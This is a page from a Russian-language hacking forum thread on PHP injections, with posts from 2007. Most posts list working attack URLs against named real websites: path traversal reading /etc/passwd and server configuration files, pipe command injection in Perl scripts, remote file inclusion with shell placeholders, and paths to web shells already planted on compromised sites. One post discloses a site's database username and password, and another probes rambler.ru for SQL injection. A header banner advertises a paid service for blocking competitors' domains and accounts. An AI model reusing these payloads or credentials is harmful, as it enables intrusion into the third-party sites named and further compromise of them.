УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
PHP Иньекции

Страница 48 из 143

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#471

04.10.2007, 22:04

NOmeR1

Познавший АНТИЧАТ

Регистрация: 02.06.2006

Сообщений: 1,188

Провел на форуме:
6023777

Репутация: 2642

Отправить сообщение для NOmeR1 с помощью ICQ

www.messagepac.net

Цитата:

http://www.messagepac.net/viewpage.php?page=[url]

www.artandarch.net

Цитата:

http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../../../etc/passwd
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../../../etc/hosts
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../../../etc/ftpusers
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../../../etc/services
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../../../etc/group
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../../../etc/profile
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../../../etc/skel/.bashrc
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../../../var/log/httpd/error_log
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../../../etc/httpd/logs/error_log

#472

04.10.2007, 22:08

NOmeR1

Познавший АНТИЧАТ

Регистрация: 02.06.2006

Сообщений: 1,188

Провел на форуме:
6023777

Репутация: 2642

www.fontenay-aux-roses.net

Цитата:

http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../../../etc/passwd
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../../../etc/hosts
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../../../etc/ftpusers
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../../../etc/syslog.conf
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../../../etc/services
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../../../etc/group
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../../../etc/bash.bashrc
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../../../etc/networks
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../../../etc/profile
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../../../etc/skel/.bashrc
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../../../usr/local/apache/conf/httpd.conf

#473

05.10.2007, 18:02

I0gen

Познающий

Регистрация: 15.08.2007

Сообщений: 97

Провел на форуме:
366486

Репутация: 100

http://www.unav.es/biblioteca/cgi-bin/archivoperlA.pl?file=|id|

http://www.g-m-online.de/cgi-bin/view.pl?file=|id|

http://www.superfs.net/infolab-guest/cgi-bin/Jlibssi.pl?file=|id|&obj=message673

http://www.baumann-andre.de/cgi-bin/quoten.pl?filename=|id|

http://www.retrojunkies.co.uk/cgi-bin/index.cgi?filename=|id|

http://www.aandi.co.jp/cgi-bin/vote/ai/basic/index.cgi?filename=|id|

#474

06.10.2007, 22:42

NOmeR1

Познавший АНТИЧАТ

Регистрация: 02.06.2006

Сообщений: 1,188

Провел на форуме:
6023777

Репутация: 2642

Цитата:

http://www.zse.toya.net.pl/wbrzo/index.php?page=downloads&sel=../../../../../../../../../../../../etc/passwd&section=html
http://www.zse.toya.net.pl/wbrzo/index.php?page=downloads&sel=../../../../../../../../../../../../etc/hosts&section=html
http://www.zse.toya.net.pl/wbrzo/index.php?page=downloads&sel=../../../../../../../../../../../../etc/ftpusers&section=html
http://www.zse.toya.net.pl/wbrzo/index.php?page=downloads&sel=../../../../../../../../../../../../etc/syslog.conf&section=html
http://www.zse.toya.net.pl/wbrzo/index.php?page=downloads&sel=../../../../../../../../../../../../etc/services&section=html
http://www.zse.toya.net.pl/wbrzo/index.php?page=downloads&sel=../../../../../../../../../../../../etc/group&section=html
http://www.zse.toya.net.pl/wbrzo/index.php?page=downloads&sel=../../../../../../../../../../../../etc/bash.bashrc&section=html
http://www.zse.toya.net.pl/wbrzo/index.php?page=downloads&sel=../../../../../../../../../../../../etc/networks&section=html
http://www.zse.toya.net.pl/wbrzo/index.php?page=downloads&sel=../../../../../../../../../../../../etc/profile&section=html
http://www.zse.toya.net.pl/wbrzo/index.php?page=downloads&sel=../../../../../../../../../../../../etc/skel/.bashrc&section=html

#475

06.10.2007, 22:56

NOmeR1

Познавший АНТИЧАТ

Регистрация: 02.06.2006

Сообщений: 1,188

Провел на форуме:
6023777

Репутация: 2642

Скрипта ждёт обновление...

Цитата:

http://zseem.ids.bielsko.pl/szok/index.php?page=../../../../../../../../../../etc/passwd
http://zseem.ids.bielsko.pl/szok/index.php?page=../../../../../../../../../../etc/hosts
http://zseem.ids.bielsko.pl/szok/index.php?page=../../../../../../../../../../etc/ftpusers
http://zseem.ids.bielsko.pl/szok/index.php?page=../../../../../../../../../../etc/syslog.conf
http://zseem.ids.bielsko.pl/szok/index.php?page=../../../../../../../../../../etc/services
http://zseem.ids.bielsko.pl/szok/index.php?page=../../../../../../../../../../etc/group
http://zseem.ids.bielsko.pl/szok/index.php?page=../../../../../../../../../../etc/bash.bashrc
http://zseem.ids.bielsko.pl/szok/index.php?page=../../../../../../../../../../etc/networks
http://zseem.ids.bielsko.pl/szok/index.php?page=../../../../../../../../../../etc/profile
http://zseem.ids.bielsko.pl/szok/index.php?page=../../../../../../../../../../etc/skel/.bashrc
http://zseem.ids.bielsko.pl/szok/index.php?page=../../../../../../../../../../etc/php4/apache/php.ini
http://zseem.ids.bielsko.pl/szok/index.php?page=../../../../../../../../../../etc/php4/cgi/php.ini

Последний раз редактировалось NOmeR1; 08.10.2007 в 22:37..

#476

06.10.2007, 23:06

NOmeR1

Познавший АНТИЧАТ

Регистрация: 02.06.2006

Сообщений: 1,188

Провел на форуме:
6023777

Репутация: 2642

adem.pl

Цитата:

http://www.adem.pl/index.php?page=../../../../../../../../../../../../etc/passwd
http://www.adem.pl/index.php?page=../../../../../../../../../../../../etc/hosts
http://www.adem.pl/index.php?page=../../../../../../../../../../../../etc/syslog.conf
http://www.adem.pl/index.php?page=../../../../../../../../../../../../etc/services
http://www.adem.pl/index.php?page=../../../../../../../../../../../../etc/group
http://www.adem.pl/index.php?page=../../../../../../../../../../../../etc/profile
http://www.adem.pl/index.php?page=../../../../../../../../../../../../etc/skel/.bashrc

#477

07.10.2007, 00:00

f1rebl00d

Познающий

Регистрация: 27.12.2006

Сообщений: 37

Провел на форуме:
1253202

Репутация: 133

http://www.pioneer.es/eur/download.jsp?dir=%2Ffiles%2Fbrochures%2F2006%2FHE_ EX&filename=../../../../../../../../../etc/passwd&method=attachment

#478

07.10.2007, 00:45

FFFFx029A

Новичок

Регистрация: 30.09.2007

Сообщений: 12

Провел на форуме:
59035

Репутация: 14

Отправить сообщение для FFFFx029A с помощью ICQ

Вот жменька:
//-------------------------------------------------------------------------------
http://www.empirekosher.com/zip.php?contentpage=/etc/passwd
http://www.empirekosher.com/zip.php?contentpage=/tmp/error.php
http://www.empirekosher.com/zip.php?contentpage=[shell.from.ftp]
http://www.empirekosher.com/zip.php?contentpage=/wwww/htdocs/ (more hosts) acces
acces:
http://acmedistributinginc.com/log/
http://acmedistributinginc.com/log/error.php (is shell)
http://www.aftyouth.com/index.php
//-------------------------------------------------------------------------------
http://www.potterfan.com/fun.php?pf=[shell].php
http://www.potterfan.com/galleries/error.php (is shell)
$CONFIG['dbserver'] = 'localhost'; // Your database server
$CONFIG['dbuser'] = 'potterfa_galleri'; // Your mysql username
$CONFIG['dbpass'] = '356801'; // Your mysql password
$CONFIG['dbname'] = 'potterfa_galleries'; // Your mysql database name
//-------------------------------------------------------------------------------

http://www.invest-telekom.ru/main.php?i=service&d=[shell_url_path]&p=[shell_name].php
//-------------------------------------------------------------------------------
http://www.eelriver.org/engine.php?bit=../../../../etc/passwd
//---------------------------------------------------------------------------------
http://www.emsukraine.com.ua/index2.php3?name=[shell]
http://www.emsukraine.com.ua/tmp/error.php (shell)
//---------------------------------------------------------------------------------
http://www.energoprom.org.ua/rus.php?inc=[shell].php
http://www.energoprom.org.ua/oscom/error.php (shell)
-----------------------------------------------------------------------------------
http://www.star-bridge.org/?section=history&subsection=[shell]
-----------------------------------------------------------------------------------
http://www.morozov.com.ua/rus/body/video.php?menu=../../../../../etc/passwd
-----------------------------------------------------------------------------------
http://www.mobistyle.com.ua/?action=[shell].php
-----------------------------------------------------------------------------------
http://credit.koras.com.ua/?[shell]
http://credit.koras.com.ua/?/var/www/koras/tmp/error.php (shell)
-----------------------------------------------------------------------------------
http://www.td-bm.com.ua/?[shell]
-----------------------------------------------------------------------------------
http://www.atp.zp.ua/oborud.php?cmd=viewnews&name=../../../etc/passwd
-----------------------------------------------------------------------------------
http://www.feod.com.ua/print.php?/etc/passwd
-----------------------------------------------------------------------------------
http://www.vision-ua.com/patient/print.php?[shell]
http://www.vision-ua.com/patient/error.php (shell)
-----------------------------------------------------------------------------------
http://www.oselya.lviv.ua/jp/notez/index.php?vibor=[shell]
-----------------------------------------------------------------------------------
http://www.delight.dn.ua/index.php?go_id=other&url=[shell]
-----------------------------------------------------------------------------------
http://www.lbu.kiev.ua/index.php?r=devices&id=[url.html]
-----------------------------------------------------------------------------------
http://www.skifiya.com.ua/?ch=[shell].php
-----------------------------------------------------------------------------------
http://www.rondo.co.ua/?p=worker_info&link=[shell]
-----------------------------------------------------------------------------------
http://www.gashuk.kiev.ua/index.php?id=[shell]
-----------------------------------------------------------------------------------
http://www.multydom.crimea.ua/index.php?[shell].php

#479

07.10.2007, 00:53

Fugitif

Постоянный

Регистрация: 23.09.2007

Сообщений: 416

Провел на форуме:
1781065

Репутация: 869

Код:

http://pureweb.fr/helpcenter/module.php?module=osTicket&file=../../../../../../etc/passwd

Код:

http://chat.uii.net.id/module.php?module=osTicket&file=../../../../../../etc/passwd

Код:

http://yourcustomerhelpdesk.com/module.php?module=osTicket&file=../../../../../../etc/passwd

Код:

http://nznetworking.com/module.php?module=osTicket&file=../../../../../../etc/passwd

Edit:

Код:

http://www.tmup-links.org/index.php?page=../../../../../../etc/passwd%00

#480

07.10.2007, 00:54

FFFFx029A

Новичок

Регистрация: 30.09.2007

Сообщений: 12

Провел на форуме:
59035

Репутация: 14

Вот рамблер на вшивость проверяю иногда, нашол скрипт доступный на скачку, может кому пригодиться:

http://orsn.rambler.ru/images/captcha.php

(скрипт покамис скачуеться как фаил и можно поглядеть пхп код этого скрипта)

------------------------------------------------------------
Вроде нашол уязвимое место:
http://polls.rambler.ru/result.html?rubric=+&id=1262
в параметре rubric если вставить число 150 то выводит страницу, если лешее число то пишет страница ненайдена, пробывал туда мускул запросы сувать - выводит пустую страницу.. Здесь наверно или ниче нет или вывод ошибок перекрыт?

------------------------------------------------------------
Вот еще интересный прикол:
http://love.rambler.ru/tips/?tip=Login'
Ответ:
Внутренняя ошибка сервера
Произошла ошибка на стороне сервера. Служба поддержки автоматически проинформирована об этом. Попробуйте повторить операцию через некоторое время. В случае если ошибка повторится, свяжитесь со службой поддержки.

ггг
-------------------------------------------------------------
Ктото рамблер редактирует:
Заходя на http://shop.rambler.ru/ идет переадресация на http://shop.rambler.ru/index.php?root=1
И пишет ошибку:
Fatal error: Call to undefined function getMainCatsName() in /var/www/html/fo/ehouse/html/ssi/search_form.php on line 5

Последний раз редактировалось FFFFx029A; 07.10.2007 в 02:05.. Причина: еще нашол по поводу рамблера..

Страница 48 из 143

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Books	PSalm69	Избранное	273	13.02.2016 01:24
Books PHP	FRAGNATIC	PHP	186	21.02.2010 02:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход